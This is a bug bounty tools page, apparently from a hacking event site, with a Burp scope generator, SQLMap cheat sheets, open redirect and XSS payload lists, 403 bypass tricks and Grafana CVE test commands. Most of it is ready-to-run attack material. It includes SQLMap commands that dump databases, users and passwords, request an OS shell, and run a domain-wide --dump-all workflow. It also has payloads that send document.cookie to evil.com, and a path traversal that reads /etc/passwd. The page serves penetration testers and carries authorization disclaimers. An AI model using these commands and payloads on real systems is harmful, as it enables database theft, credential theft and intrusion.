HackwithIndiaa

India's Biggest and Premier Free Live Hacking Event

Free Security Tools for Bug Bounty Hunters

Professional penetration testing tools for ethical hackers and cybersecurity professionals

Burp Suite Scope Creator - Free Online Tool

Generate Burp Suite scope configurations instantly for bug bounty programs. Create multiple target scopes for penetration testing and web application security assessment.

Perfect for ethical hackers, penetration testers, and bug bounty hunters using Burp Suite Professional or Community Edition. Save time on scope configuration for your security testing workflow.

Paste Domain or subdomain

Copy your scopes

Basic Regex - Matches specific TLD subdomains (.*\.domain\.com$)

Use this to find subdomains with a specific top-level domain extension

Advanced Regex - Matches any TLD (.*\.domain\..*$)
Use this to match domains across all top-level domain extensions (.com, .net, .org, etc.)
Most Advanced - Matches protocol and all subpaths ((^[^.]+:\/\/|[^\\.]+\.)domain.*)
Most comprehensive pattern that includes protocol (http/https) and matches all paths containing the domain
SQLMap Commands Guide
Essential SQLMap commands for SQL injection testing and database enumeration. Professional toolkit for ethical hackers and penetration testers.
Detect and Identify DBMS
Single URL detection with comprehensive testing
sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent --banner --is-dba --dbs
Dump Specific Database
Extract all data from a specific database
sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent -D dbname --dump
Dump Specific Table
Target specific tables within a database
sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent -D dbname -T tablename --dump
Dump Specific Columns
Extract specific columns from a table
sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent -D dbname -T tablename -C "id,username,password" --dump
Test Multiple Parameters
Automatically test all GET/POST parameters
sqlmap -u "https://target.com/page.php?id=1&cat=2" --batch --risk=3 --level=5 --random-agent -p "id,cat"
With Authentication Cookies
Test authenticated endpoints with session cookies
sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent --cookie="SESSION=xxxx"
With Custom Headers
Include custom HTTP headers for testing
sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "Authorization: Bearer TOKEN"
POST Request Testing
Test POST parameters in request body
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch --risk=3 --level=5 --random-agent
From Raw HTTP Request File
Use captured HTTP request from Burp Suite or similar tools
sqlmap -r request.txt --batch --risk=3 --level=5 --random-agent
Crawl and Test Website
Automatically crawl and test discovered links
sqlmap -u "https://target.com" --crawl=2 --batch --risk=3 --level=5 --random-agent
Enumerate Users and Privileges
Discover database users, passwords, and privileges
sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent --users --passwords --privileges
OS Shell Access
Attempt to gain operating system shell access (when allowed)
sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5 --random-agent --os-shell
Automated Domain-Wide SQL Injection Testing
Comprehensive workflow for testing an entire domain by collecting URLs, extracting parameters, and running automated SQLMap scans.
Complete Domain Testing Workflow
1
Collect URLs with Waymore
Gather all historical URLs from web archives for the target domain
waymore -i example.com -mode U -oU waymore_urls.txt
2
Filter URLs for SQL Injection Patterns
Use gf tool to extract URLs with SQL injection patterns and remove duplicates
cat waymore_urls.txt | gf sqli | sort -u >parameters.txt
3
Run SQLMap on All URLs
Test all collected parameterized URLs for SQL injection vulnerabilities
sqlmap -m parameters.txt --batch --risk=3 --level=5 --random-agent
4
Dump Everything If Vulnerable
If vulnerabilities are found, extract all available database content
sqlmap -m parameters.txt --batch --risk=3 --level=5 --random-agent --dump-all
Pro Tip: This workflow automates the discovery and testing of SQL injection vulnerabilities across an entire domain. Make sure to have sufficient storage as --dump-all can retrieve large amounts of data.
Disclaimer: These tools are intended for authorized security testing and ethical hacking only. Always obtain proper authorization before testing any system. Unauthorized access to computer systems is illegal.
Open Redirect Testing & Exploitation Guide
What Is an Open Redirect?
An Open Redirect occurs when a web application accepts unvalidated, user-controlled input that determines the destination URL for an HTTP redirect. If the application does not enforce strict validation or an allowlist of safe domains, attackers can manipulate the redirect to send users to arbitrary external sites.
Target Parameters:
  • • redirect=, url=, next=
  • • return=, dest=, r=
  • • redir=, link=, goto=
20 Core Redirect Payloads for Initial Testing
Use these payloads against redirect parameters. Example: https://target.com/login?redirect=PAYLOAD_HERE
/https://evil.com
//evil.com
///evil.com
////evil.com
/%2F%2Fevil.com
/%0A/evil.com
/%09/evil.com
/%5c/evil.com
/.evil.com
/..%2F..%2Fevil.com
/https:evil.com
/https:/evil.com
/https://evil.com?param=1
/https://evil.com#frag
/https://evil.com%00
/https://trusted.com@evil.com
//trusted.com@evil.com
/https:///evil.com
/%2F%5Cevil.com
/https://evil.com//path
50 Open Redirect → XSS Payloads
Test whether open redirect can execute JavaScript when interpreted in URL-based DOM sinks or script handlers. If redirect parameter accepts javascript: or data: protocols, script execution is possible.
JavaScript Protocol Payloads
javascript:alert(1)
javascript://%0Aalert(1)
javascript:confirm(1)
javascript:prompt(1)
javascript:window.location='https://evil.com'
javascript:new Image().src='https://evil.com/?c='+document.cookie
javascript:fetch('https://evil.com/?c='+document.cookie)
javascript:(()=>alert(1))()
javascript:void(document.cookie)
javascript:document.body.innerHTML='<img src=x onerror=alert(1)>'
javascript:setTimeout('alert(1)',0)
Data URI Payloads
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html,<svg onload=alert(1)>
data:text/html,<img src=x onerror='alert(1)'>
data:text/html,<body onload='alert(1)'></body>
data:text/html,<meta http-equiv=refresh content=0;url=javascript:alert(1)>
Encoded & Obfuscated Variants
%6A%61%76%61%73%63%72%69%70%74%3Aalert(1)
javascript:%26%230041%3Balert(1)
javascript:alert%28%31%29
data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
jAvAsCrIpT:alert(1)
java\u0073cript:alert(1)
Hash / Fragment Injection
#javascript:alert(1)
?redirect=#javascript:alert(1)
#data:text/html,<script>alert(1)</script>
Protocol Mixing & Hybrid
https://trusted.com@javascript:alert(1)
https://trusted.com#javascript:alert(1)
http://trusted.com/%2F%2Fjavascript:alert(1)
vbscript:msgbox('XSS')
javascript:/*test*/alert(1)
Security Warning: Open Redirect vulnerabilities can lead to serious security breaches including phishing attacks and account compromise. Always test responsibly and only on authorized systems with proper permissions.
403 Forbidden Bypass Techniques
When you encounter a 403 Forbidden error on restricted endpoints, these techniques can help bypass access controls during penetration testing. Test these methods to identify misconfigurations in access control implementations.
Using X-Original-URL Header
Bypass by sending the restricted path in the X-Original-URL header
Original Request (403)
GET /admin HTTP/1.1
Host: target.com
Bypass Request (200)
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
Appending %2e After First Slash
URL encode a dot after the first slash to bypass path-based restrictions
Original URL (403)
http://target.com/admin
Bypass URL (200)
http://target.com/%2e/admin
Path Manipulation with Dots, Slashes, and Semicolons
Add special characters to manipulate URL parsing and bypass filters
http://target.com/admin→ 403
Try these bypasses:
http://target.com/secret/.http://target.com//secret//http://target.com/./secret/..http://target.com/;/secrethttp://target.com/.;/secrethttp://target.com//;//secret
Add "..;/" After Directory Name
Use path traversal with semicolon to confuse path normalization
Original URL (403)
http://target.com/admin
Bypass URL (200)
http://target.com/admin..;/
Case Manipulation
Change letter cases if the server is case-insensitive but the filter is case-sensitive
Original URL (403)
http://target.com/admin
Bypass URL (200)
http://target.com/aDmIN
Via Web Cache Poisoning
Exploit caching mechanisms with the X-Original-URL header
GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
Note: These bypass techniques exploit common misconfigurations in access control implementations. Success depends on the specific server configuration, web application framework, and security controls in place. Always perform testing within authorized scope only.
Grafana Security Manual Cheat Sheet
Comprehensive guide for testing Grafana installations against known CVEs and vulnerabilities. Essential for security researchers and penetration testers assessing Grafana deployments.
CVE-2021-43798
Directory Traversal for Arbitrary File Read
Explanation:
Grafana static plugin file serving allows directory traversal via plugin paths, letting an unauthenticated attacker read arbitrary files (e.g., /etc/passwd). Script tests this against built-in plugins.
Affected Versions:
Grafana 8.0.0–8.3.0 (unpatched)
Script Test:
Attempts to GET for plugins like: alertlist, annolist, barchart, graph, table
/public/plugins/<plugin>/../../../../../../etc/passwd
Manual Test:
curl -s https://<host>/public/plugins/alertlist/../../../../../../etc/passwd
Look for file indicators: root:, /bin/, :x:, daemon:
If present, directory traversal is confirmed.
CVE-2025-4123
"Grafana Ghost" Path Traversal & Open Redirect (XSS)
Explanation:
The scanner calls this "Grafana Ghost". It combines unvalidated redirect & path traversal that may lead to XSS and external redirection.
Script Test:
Checks for unvalidated redirects and traversal:
/redirect?url=http://external-test-domain.example.com
/public/plugins/test/../../../
Manual Test:
Unvalidated redirect:
curl -I "https://<host>/redirect?url=https://evil.com"
Check Location header pointing to external domain. If redirect occurs without validation → issue.
Path traversal:
curl -I "https://<host>/public/plugins/test/../../../"
Unexpected status or redirection indicates potential traversal.
CVE-2024-9264
DuckDB SQL Injection (Information Disclosure)
Explanation:
SQL injection in experimental "SQL Expressions" feature using DuckDB backend. The script does not exploit it but flags endpoint presence.
Script Test:
POST /api/ds/query?ds_type=__expr__&requestId=security_scan
with a minimal SQL query.
Manual Test (auth needed):
  1. Authenticate to Grafana.
  2. Send expression query:
curl -sk -X POST "https://<host>/api/ds/query?ds_type=__expr__" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <API_TOKEN>" \
  --data '{"queries":[{"refId":"A","type":"sql","expression":"SELECT 1"}]}'
If no auth required or SQL executes, vulnerability exists.
CVE-2018-15727
Authentication Bypass via Cookie Forging
Explanation:
Old vulnerability allowing bypass of "remember me" cookie logic when LDAP/OAuth is used and predictable cookie is generated.
Affected Versions:
Older than Grafana 5
Script Test:
Fetch login page HTML and look for:
ldap_enabled, ldap auth, oauth_client, oauth2, google_client_id
Manual Test:
Visit /login and inspect HTML for LDAP/OAuth login hints:
curl -s https://<host>/login | grep -Ei "ldap|oauth"
Presence suggests potential older bypass scenario.
CVE-2021-39226
Snapshot Enumeration
Explanation:
Predictable snapshot IDs allow enumeration of snapshots that shouldn't be public.
Script Test:
GET and try small IDs:
/api/snapshots/1
/dashboard/snapshot/1
Manual Test:
curl -s https://<host>/api/snapshots/1
curl -s https://<host>/dashboard/snapshot/1
If response shows valid snapshot content → issue.
CVE-2020-11110
Snapshots Stored XSS
Explanation:
Stored XSS via snapshot API if unauthenticated users can post snapshots containing JS.
Script Test:
GET /api/snapshots
Manual Test:
curl -s https://<host>/api/snapshots
If returns status 200 without auth → snapshot interface exposed → potential XSS.
CVE-2021-41174
AngularJS Expression Injection
Explanation:
AngularJS templating in old Grafana versions (≤8.3) may allow arbitrary expression injection via dashboard snapshot URLs.
Affected Versions:
Grafana ≤8.3
Script Test:
GET /dashboard/snapshot/{{constructor.constructor('return 1337')()}}?orgId=1
Manual Test:
curl -s "https://<host>/dashboard/snapshot/%7B%7Bconstructor.constructor('return%201337')()%7D%7D?orgId=1"
If rendered, AngularJS template injection is present.
CVE-2021-27358
Snapshot DoS via Unauthenticated POST
Explanation:
Unauthenticated POST to snapshot API can cause deny-of-service problems.
Script Test:
POST to /api/snapshots with JSON.
Manual Test:
curl -sk -X POST https://<host>/api/snapshots \
  -H "Content-Type: application/json" \
  --data '{"name":"test"}'
If accepted without auth → issue.
Security Warning: These Grafana vulnerabilities can lead to serious security breaches including unauthorized file access, XSS attacks, SQL injection, and denial of service. Always test responsibly and only on authorized systems with proper permissions. Never exploit vulnerabilities on production systems without explicit authorization.